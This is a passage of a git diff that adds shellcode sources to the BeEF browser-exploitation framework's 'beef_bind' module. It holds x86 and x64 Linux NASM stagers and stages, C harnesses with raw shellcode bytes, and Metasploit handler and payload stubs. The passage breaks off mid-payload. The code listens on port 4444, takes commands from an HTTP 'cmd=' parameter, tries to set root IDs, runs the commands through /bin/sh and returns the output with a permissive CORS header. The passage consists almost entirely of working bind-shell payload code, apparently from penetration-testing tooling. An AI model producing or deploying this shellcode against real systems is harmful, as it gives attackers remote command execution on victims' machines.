+   char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+   if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+   memcpy(ptr, shellcode, sizeof(shellcode));
+   sc = (int(*)())ptr;
+   (void)((void(*)())ptr)();
+   printf("\n");
+   return 0;
+}
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm
new file mode 100755
index 000000000..2489775d3
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm
@@ -0,0 +1,285 @@
+BITS 64
+
+SECTION .text
+global _start
+_start:
+	cld ;clear direction flag
+	xor rdx,rdx ;zero rdx
+
+	push BYTE 0x02
+	pop r14
+
+	;create two pipes
+createpipes:
+	push rdx ;allocate space on the stack
+	mov rdi, rsp ;point to the stack
+	push BYTE 0x16 
+	pop rax ;sys_pipe
+	syscall
+	dec r14
+	test r14, r14 ;create 2 pipes 
+	je endcreatepipes
+	jmp createpipes
+
+endcreatepipes:
+	;sys_fork
+	push BYTE 0x39
+	pop rax
+	syscall
+	cmp eax, 0x00 ;parent or child?
+	je child
+
+	xor rdi, rdi ; zero rdi
+	mov edi, DWORD [rsp+0x8] ; close read end of one pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x4] ;close write end of the other pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	;make non-blocking
+	mov edi, DWORD [rsp] ;fd
+	push BYTE 0x04
+	pop rsi ;F_SETFL
+	xor rdx, rdx
+	mov rdx, 0x800 ;O_NONBLOCK
+	push BYTE 0x48
+	pop rax ; sys_fcntl
+	syscall	
+
+
+	;allocate one page of memory
+	xor rdi,rdi ;system determines location
+	push 0x1000 ;allocated size
+	pop rsi
+	push BYTE 0x07
+	pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push BYTE 0x22
+	pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
+	push rdi
+	push rdi
+	pop r9 ;offset
+	pop r8 ;fd
+	push BYTE 0x09
+	pop rax
+	syscall
+	mov r14, rax ;save pointer allocated memory for later use
+
+doforever:
+	;initialize socket
+	xor rdx, rdx ;zero rdx (proto =0)
+	push BYTE 0x01
+	pop rsi ;SOCK_STREAM
+	push BYTE 0x02
+	pop rdi ;AF_INET = 2
+	push BYTE 0x29
+	pop rax ;sys_socket
+	syscall
+	mov rbx, rax ; save socket filediscriptor
+
+	;reuse socket
+	push 0x01  ;true
+	mov r10, rsp ;ptr to optval
+	push BYTE 0x08
+	pop r8 ;sizeof socklen_t
+	push BYTE 0x02
+	pop rdx  ;SO_REUSEADDR = 2
+	push BYTE 0x01
+	pop rsi ;SOL_SOCKET = 1	
+	mov rdi, rbx ;socketfd
+	push BYTE 0x36 ;sys_setsockopt
+	pop rax
+	syscall
+
+	pop rax ;clean stack
+
+
+	;bind socket to port
+	xor rax,rax
+	push BYTE 0x10
+	pop rdx ;addrlen
+	push rax
+	push rax
+	mov DWORD [rsp], 0x5C110002 ;PORT 0x115c = 4444
+	mov rsi, rsp ;ptr to sokaddr
+	mov rdi, rbx ;socketfd
+	push BYTE 0x31
+	pop rax ;sys_bind
+	syscall
+
+	pop rax ;clean stack
+	pop rax
+
+	;listen 
+	xor rsi, rsi ;backlog ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x32
+	pop rax ;sys_listen
+	syscall
+
+	;accept
+	xor rdx,rdx ;addrlen ptr = NULL
+	xor rsi,rsi ;sockaddr ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x2b
+	pop rax ;sys_accept
+	syscall
+
+	mov r15, rax ;save client socket fd for later use
+
+	;close serversocket
+	mov rdi, rbx ;close server socket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall 
+
+
+	mov rcx, 0x1000 ;pagesize
+firstzeromemory:
+	;zero out memory
+	dec rcx
+	mov rbx, r14
+	add rbx, rcx
+	mov BYTE [rbx], 0x00
+	jrcxz readfromsocket
+	jmp firstzeromemory 	
+
+readfromsocket:
+	xor rdx, rdx
+
+	;read into allocated memory
+	mov rdi, r15 ;client socketfd
+	mov rsi, r14 ;ptr to allocated memory
+	mov dx, 0x400 ;read 1024 bytes
+	push BYTE 0x00
+	pop rax ;sys_read
+	syscall
+
+	mov rcx, 0x400 ;search in 1024 bytes 
+	mov rbx, r14 ;ptr to allocated memory
+search:
+	cmp DWORD[rbx], 0x3d646d63 ;compare with "cmd="
+	je found ;cmd= found
+	inc rbx
+	dec rcx
+	jrcxz notfound ;cmd= not in recieved buffer
+	jmp search ;search some more
+found:
+	xor rdi, rdi
+	mov rcx, rbx 
+	add rcx, 0x03 ;skip "cmd"
+	mov rsi, rcx
+	mov edi, DWORD [rsp+0xC] ;write to pipe
+sendcommand:
+	inc rsi ;first time skip "=", move to next byte
+	push BYTE 0x01
+	pop rdx ;write one byte
+	push BYTE 0x01
+	pop rax ;sys_write
+	syscall
+	cmp BYTE [rsi], 0x0a ;LF character?
+	jne sendcommand ;else continue write to pipe
+
+	;sleep one second
+	push BYTE 0x23
+	pop rax ;sys_nanosleep
+	push DWORD 0x00
+	push DWORD 0x01 ;one second
+	mov rdi, rsp ;ptr to argument array
+	xor rsi, rsi ;NULL
+	syscall
+
+	pop rax ;clean stack
+	pop rax
+
+notfound:
+	call writehttpheaders
+	db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a
+	db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a
+
+writehttpheaders:
+	pop rsi ;source address saved by call
+	mov rdi, r14 ;ptr to allocated memory
+	add rdi, 0x400 ;skip 1024 bytes
+	mov rcx, 0x62 ;copy 98 bytes
+	rep movsb
+
+	xor rdi, rdi ;zero rdi
+	mov edi, DWORD [rsp] ;read from pipe
+	mov rsi, r14 ;ptr to allocated memory
+	add rsi, 0x400 ;skip 1024 bytes
+	add rsi, 0x62 ;skip header
+	mov rdx, 0xb86 ;read max 2950 bytes	
+	xor rax,rax ;sys_read
+	syscall
+
+
+	mov rdi, r15 ;clientsocket fd
+	mov rsi, r14 ;ptr to allocated memory
+	add rsi, 0x400 ;skip 1024 first bytes
+	mov rdx, 0xbe8 ;send max 3048 bytes
+	push BYTE 0x01
+	pop rax ;sys_write
+	syscall
+
+	mov rdi, r15 ;close clientsocket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+	
+	jmp doforever
+child:
+	xor rdi, rdi 
+	mov edi, DWORD [rsp+0xc] ;close output side of pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	xor rdi, rdi ;close stdin
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x08] ;dup input side to stdin
+	push BYTE 0x20
+	pop rax ;sys_dup
+	syscall
+
+
+	mov edi, DWORD [rsp] ;close input side of other pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	xor rdi, rdi
+	inc rdi ;close stdout
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x4] ;dup output side to stdout
+	push BYTE 0x20
+	pop rax ;sys_dup
+	syscall
+
+	;setresuid(0,0,0)
+	xor rdi, rdi
+	xor rsi, rsi
+	xor rdx, rdx
+	push BYTE 0x75
+	pop rax ;sys_resuid
+	syscall
+
+	push BYTE 0x3b
+	pop rax ;sys_execve
+	mov rdi, 0x0068732f6e69622f ;/bin/shNULL
+	push rdi ;push to stack
+	mov rdi, rsp ;ptr to stack
+	xor rsi, rsi ;NULL
+	xor rdx, rdx ;NULL
+	syscall
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm
new file mode 100755
index 000000000..1a5d776bb
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm
@@ -0,0 +1,106 @@
+BITS 64
+
+SECTION .text
+global _start
+_start:
+	cld ;clear direction flag
+	xor rdx, rdx ;zero rdx (proto=0)
+	push BYTE 0x01
+	pop rsi ;SOCK_STREAM
+	push BYTE 0x02
+	pop rdi ;AF_INET = 2
+	push BYTE 0x29
+	pop rax ;sys_socket
+	syscall
+	mov rbx, rax ; save socket filediscriptor
+
+	;reuse socket
+	push 0x01  ;true
+	mov r10, rsp ;ptr to optval
+	push BYTE 0x08
+	pop r8 ;sizeof socklen_t
+	push BYTE 0x02
+	pop rdx ;SO_REUSEADDR = 2
+	push BYTE 0x01
+	pop rsi ;SOL_SOCKET = 1
+	mov rdi, rbx ;socketfd
+	push BYTE 0x36 ;sys_setsockopt
+	pop rax
+	syscall
+
+	xor rax,rax
+	push BYTE 0x10
+	pop rdx ;addrlen
+	push rax
+	push rax
+	mov DWORD [rsp], 0x5c110002 ;PORT 0x115c = 4444
+	mov rsi, rsp ;ptr to sokaddr
+	mov rdi, rbx ;socketfd
+	push BYTE 0x31
+	pop rax ;sys_bind
+	syscall
+
+	xor rsi, rsi ;backlog ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x32
+	pop rax ;sys_listen
+	syscall
+
+	;accept
+	xor rdx,rdx ;addrlen ptr = NULL
+	xor rsi,rsi ;sockaddr ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x2B
+	pop rax ;sys_accept
+	syscall
+
+	mov r15, rax ;save client socket fd for later use
+
+	mov rdi, rbx ;close server socket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall 
+
+	;allocate memory
+	
+	xor rdi,rdi ;system determines location
+	push 0x1000 ;allocated size
+	pop rsi
+	push BYTE 0x07
+	pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push BYTE 0x22
+	pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
+	push rdi
+	push rdi
+	pop r9 ;offset
+	pop r8 ;fd
+	push BYTE 0x09
+	pop rax
+	syscall
+	mov r14, rax ;save pointer allocated memory for later use
+
+	;read into allocated memory
+	mov rdi, r15 ;client socketfd
+	mov rsi, r14 ;ptr to allocated memory
+	mov dx, 0x1000 ;read one page of memory
+	push BYTE 0x00
+	pop rax ;sys_read
+	syscall
+
+	;close clientsocketfd
+	mov rdi, r15 ;client socketfd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov rsi, r14 ;ptr to allocated memory
+search:
+	cmp DWORD [rsi], 0x3d646d63 ;compare with "cmd="
+	je short found ;cmd= found
+	inc rsi
+	jmp short search ;search some more
+found:
+	push BYTE 0x04 ;skip "cmd="
+	pop rax
+	add rsi, rax
+	jmp rsi ;jump to stage
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c
new file mode 100644
index 000000000..f4e198fa3
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c
@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+ 
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -m32 -fno-stack-protector -z execstack -o socket socket.c
+**/
+
+#include 
+#include 
+#include 
+#include 
+
+int (*sc)();
+
+char shellcode[] = "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7";
+
+int main(int argc, char **argv) {
+   char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+   if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+   memcpy(ptr, shellcode, sizeof(shellcode));
+   sc = (int(*)())ptr;
+   (void)((void(*)())ptr)();
+   printf("\n");
+   return 0;
+}
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm
new file mode 100644
index 000000000..3ec5d952b
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm
@@ -0,0 +1,290 @@
+; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+; Browser Exploitation Framework (BeEF) - http://beefproject.com
+; See the file 'doc/COPYING' for copying permission
+
+BITS 32
+
+SECTION .text
+
+global _start
+_start:
+	cld ;clear direction flag
+	xor edx, edx ;zero edx
+
+	push BYTE 0x02
+	pop ecx
+	;create two pipes
+createpipes:
+	push edx ;allocate space on stack
+	push edx
+	mov ebx, esp ; ptr to argument array
+	push BYTE 0x2A ;sys_pipe
+	pop eax
+	int 0x80 ;syscall 
+	dec ecx 
+	jcxz endcreatepipes ;jmp when both pipes are created
+	jmp short createpipes ;create next pipe
+
+endcreatepipes:	
+	;create fork	
+	xor ebx, ebx ;zero ebx
+	push BYTE 0x02 ;sys_fork
+	pop eax
+	int 0x80 ;syscall
+	cmp eax, 0x00 ;parent or child
+	je child
+
+	mov ebx, [esp+0x8] ;close read end of one pipe
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x4] ;close write end of the other pipe
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	; make non blocking
+	mov ebx, [esp] ;fd
+	push BYTE 0x04 ;F_SETFL
+	pop ecx
+	push 0x800 ;O_NONBLOCK
+	pop edx
+	push BYTE 0x37 ;sys_fcntl
+	pop eax
+	int 0x80
+ 
+	;allocate one page of memory
+	push BYTE 0x00 ;offset = 0
+	push 0xffffffff ;fd=-1
+	push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
+	push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push 0x1000 ;allocated size
+	push 0x00 ;system determines location
+	mov ebx, esp ;ptr to argument array
+	push BYTE 0x5a
+	pop eax
+	int 0x80
+	mov edi, eax ;ptr to allocated memory
+	add esp, 0x18
+	
+doforever:
+	xor edx, edx
+	xor eax, eax
+
+	;initialize socket
+	push BYTE 0x01
+	pop ebx ;SYS_SOCKET
+	push eax ;proto = 0
+	inc eax
+	push eax ;SOCK_STREAM = 1
+	inc eax
+	push eax ;AF_INET = 2
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	mov esi, eax ; save socket filedescriptor
+	add esp, 0x0C
+
+	;reuse socket
+	push BYTE 0x0E
+	pop ebx ;SYS_SETSOCKOPT
+	push BYTE 0x04 ;sizeof socklen_t
+	push esp ;address of socklen_t
+	push BYTE 0x02 ;SO_REUSEADDR = 2
+	push BYTE 0x01 ;SOL_SOCKET = 1
+	push esi ;socket fd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102	
+	int 0x80
+	add esp, 0x14
+
+	;bind socket to port
+	push BYTE 0x02
+	pop ebx ;SYS_BIND
+	push edx ;INADDR_ANY
+	push 0x5c110002 ;PORT 0x115c = 4444
+	mov ecx, esp ;ptr to server struct
+	push BYTE 0x10 ; addrlen
+	push ecx
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	add esp, 0x14
+
+	inc ebx
+	inc ebx  ;SYS_LISTEN
+	push ebx ;backlog
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ; socketcall is syscall #102
+	int 0x80
+	add esp, 0x08
+	
+	inc ebx ;SYS_ACCEPT
+	push edx ;socklen = 0
+	push edx ;sockaddr ptr = NULL
+	push esi ;sockfd
+	mov ecx, esp ;ptr to argumet array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	add esp, 0x0c
+	
+	xchg esi, eax ;serversocket in eax and clientsocket handler in esi
+	xchg eax, ebx ;serversocket in ebx
+	mov eax, 0x06 ;close serversocket
+	int 0x80
+
+	mov ecx, 0x1000
+firstzeromemory:
+	;zero out memory
+	dec ecx
+	mov ebx, edi
+	add ebx, ecx
+	mov BYTE [ebx], 0x00
+	jecxz readfromsocket
+	jmp firstzeromemory
+
+readfromsocket:
+	;read from socket into memory
+	mov dx, 0x400 ;read 1024 bytes
+	mov ecx, edi ;ptr to allocated memory
+	mov ebx, esi ;clientsocket
+	push BYTE 0x03
+	pop eax ;sys_read
+	int 0x80
+
+	push edi ;ptr to allocate memory
+	push esi ;clientsocket
+	mov ebx, edi ;ptr to allocated memory
+	mov ecx, 0x400 ;search in 1024 bytes
+search:
+	cmp DWORD [ebx], 0x3d646D63 ;compare with "cmd="
+	je found ;cmd= found
+	inc ebx
+	dec ecx
+	jecxz notfound ;cmd= not in recieved buffer
+	jmp search ;search some more
+
+found:
+	mov ecx, ebx ;put ptr to memory where "cmd=" was found
+	add ecx, 0x03 ;skip "cmd"
+	mov ebx, [esp+0x14] ;write to pipe
+sendcommand:
+	inc ecx ;first time skip "=", move to next byte
+	push BYTE 0x01 ;write one byte
+	pop edx
+	push BYTE 0x04 ;sys_write
+	pop eax
+	int 0x80
+	cmp BYTE [ecx], 0x0a ;LF character?
+	jne sendcommand ;else continue write to pipe
+
+	;sleep one second
+	push 0x00
+	push 0x01 ;one second
+	mov ebx, esp ;ptr to argument array
+	xor ecx, ecx ;NULL
+	mov eax, 0xA2 ;sys_nanosleep
+	int 0x80
+	add esp, 0x08 ;clean up stack	
+
+notfound:
+	call writehttpheaders	
+	db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a  ;HTTP/1.1 200 OK
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a  ;Content-Type: text/html
+	db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a  ;Access-Control-Allow-Origin: *
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a  ;Content-Length: 3048
+
+writehttpheaders:
+	pop esi ;source address saved by call
+	add edi, 0x400 ;ptr to memory skip 1024 bytes
+	mov ecx, 0x62 ;copy 98 bytes
+	rep movsb
+	
+	pop edi ;restore clientsocket 	
+	pop esi ;restore ptr to memory
+	
+		
+	mov ebx, [esp] ;read from pipe
+	mov ecx, esi ;ptr to memory
+	add ecx, 0x400 ;skip 1024 bytes
+	add ecx, 0x62 ;skip header
+	push 0xB86 ;read max 2950 bytes
+	pop edx
+	push BYTE 0x03 ;sys_read
+	pop eax
+	int 0x80
+
+	mov ebx, edi ;clientsocket
+	mov ecx, esi ;ptr to memory
+	add ecx, 0x400 ;skip 1024 first bytes
+	mov edx, 0xbe8 ;send max 3048 bytes
+	push BYTE 0x04 ;sys_write
+	pop eax
+	int 0x80
+
+	;close clientsocket	
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov edi, esi ;restore memory ptr into edi
+	jmp doforever
+
+child:
+	mov ebx, [esp+0xC] ;close output side of pipe 
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+	
+	xor ebx, ebx ;close stdin
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x8] ;dup input side to stdin
+	push BYTE 0x29 ;sys_dup
+	pop eax
+	int 0x80
+	
+	mov ebx, [esp] ;close input side of other pipe
+	push BYTE 0x06
+	pop eax
+	int 0x80
+
+	xor ebx, ebx
+	inc ebx ;close stdout
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x4] ;dup output side to stdout
+	push BYTE 0x29 ;sys_dup
+	pop eax
+	int 0x80
+
+	;setresuid(0,0,0)
+	xor eax, eax
+	xor ebx, ebx
+	xor ecx, ecx
+	xor edx, edx
+	mov al, 0xa4 ;sys_setresuid16
+	int 0x80
+
+	;execve("/bin//sh", 0, 0)	
+	xor eax, eax
+	push eax
+	push eax
+	push 0x68732f2f ;//sh
+	push 0x6e69622f ;/bin
+	mov ebx, esp
+	push BYTE 0x0b ;sys_execve
+	pop eax
+	int 0x80
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm
new file mode 100644
index 000000000..903a7f0b4
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm
@@ -0,0 +1,111 @@
+; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+; Browser Exploitation Framework (BeEF) - http://beefproject.com
+; See the file 'doc/COPYING' for copying permission
+
+BITS 32
+
+SECTION .text
+
+global _start
+_start:
+	cld ;clear direction flag
+	xor eax, eax ;zero eax
+	xor edx, edx ;zero edx
+
+	;initialize socket
+	push BYTE 0x01
+	pop ebx ;SYS_SOCKET
+	push eax ;  proto = 0 
+	inc eax
+	push eax ;SOCK_STREAM = 1
+	inc eax 
+	push eax ;AF_INET = 2
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102	
+	int 0x80
+	mov esi, eax ;save socket filediscriptor
+
+	push BYTE 0x0E
+	pop ebx ;SYS_SETSOCKOPT
+	push BYTE 0x04  ;sizeof socklen_t
+	push esp ; address of socklen_t
+	push BYTE 0x02  ;SO_REUSEADDR = 2
+	push BYTE 0x01 ;SOL_SOCKET = 1
+	push esi ;socket fd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ; socketcall is syscall #102
+	int 0x80
+
+	;bind socket to port
+	push BYTE 0x02
+	pop ebx ;SYS_BIND
+	push edx ;INADDR_ANY
+	push 0x5c110002 ;PORT 0x115C = 4444
+	mov ecx, esp ;server struct
+	push BYTE 0x10 ;addrlen
+	push ecx
+	push esi ;socketfd
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	inc ebx
+	inc ebx ;SYS_LISTEN
+	push ebx ;backlog
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	inc ebx ;SYS_ACCEPT
+	push edx ;socklen = 0
+	push edx ;sockaddr ptr = NULL
+	push esi ;socketfd
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	xchg esi, eax ;serversocket in eax and client socket handler into esi
+	xchg eax, ebx ;serversocket in ebx
+	mov eax, 0x6 ;close serversocket
+	int 0x80
+
+	push BYTE 0x00 ;offset =0
+	push 0xFFFFFFFF ;fd = -1
+	push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
+	push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push 0x1000 ;allocated size
+	push BYTE 0x00 ;system determines location
+	mov ebx, esp ;ptr tot argument array
+	push BYTE 0x5a
+	pop eax ;MMAP call
+	int 0x80
+	mov edi, eax ;ptr to allocated memory
+
+	; read from socket into memory
+	mov dx, 0x1000 ;max bytes to read
+	mov ecx, edi ;pointer to memory
+	mov ebx, esi ;clientsocket
+	push BYTE 0x03
+	pop eax
+	int 0x80	
+
+	push BYTE 0x06
+	pop eax ;close clientsocket
+	int 0x80
+
+search:
+	cmp DWORD [edi], 0x3d646d63 ;compare with "cmd="
+	je short found ;jump if found
+	inc edi ;look some further
+	jmp short search
+found:
+	push BYTE 0x04 
+	pop eax
+	add edi, eax ;skip "cmd="
+	jmp edi ;jump to the staged shellcode
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb
new file mode 100644
index 000000000..29be93ecd
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb
@@ -0,0 +1,73 @@
+##
+# $Id: beef_bind-handler.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+module Msf
+module Handler
+
+###
+#
+# This module implements the Bind TCP handler placeholder only.
+#
+###
+module BeEFBind
+
+	include Msf::Handler
+
+	#
+	# Returns the handler specific string representation
+	#
+	def self.handler_type
+		return "beef_bind"
+	end
+
+	#
+	# Returns the connection oriented general handler type
+	#
+	def self.general_handler_type
+		"bind"
+	end
+
+	#
+	# Initializes a bind handler and adds the options common to all bind
+	# payloads, such as local port.
+	#
+	def initialize(info = {})
+		super
+		register_options(
+			[
+				Opt::LPORT(4444),
+				#OptAddress.new('RHOST', [false, 'The target address', '']),
+			], Msf::Handler::BeEFBind)
+	end
+
+	#
+	# Placeholder only
+	#
+	def cleanup_handler
+	end
+
+	#
+	# Placeholder only
+	#
+	def add_handler(opts={})
+		# Start a new handler
+		start_handler
+	end
+
+	#
+	# Placeholder only
+	#
+	def start_handler
+	end
+
+	# 
+	# Placeholder only
+	#
+	def stop_handler
+	end
+
+end
+
+end
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
new file mode 100644
index 000000000..99079e92f
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
@@ -0,0 +1,85 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Linux
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind Linux Command Shell Stage (stage x64)',
+			'Description'   => 'Spawn a piped command shell (staged) with an HTTP interface',
+			'Author'        => [ 'Bart Leppens' ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X64,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadCompat' =>
+				{
+					'Convention' => 'beef_bind'
+				},
+			'Stage'         =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 165, 'n' ]
+						},
+					'Payload' =>
+						"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" +
+						"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" +
+						"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" +
+						"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" +
+						"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" +
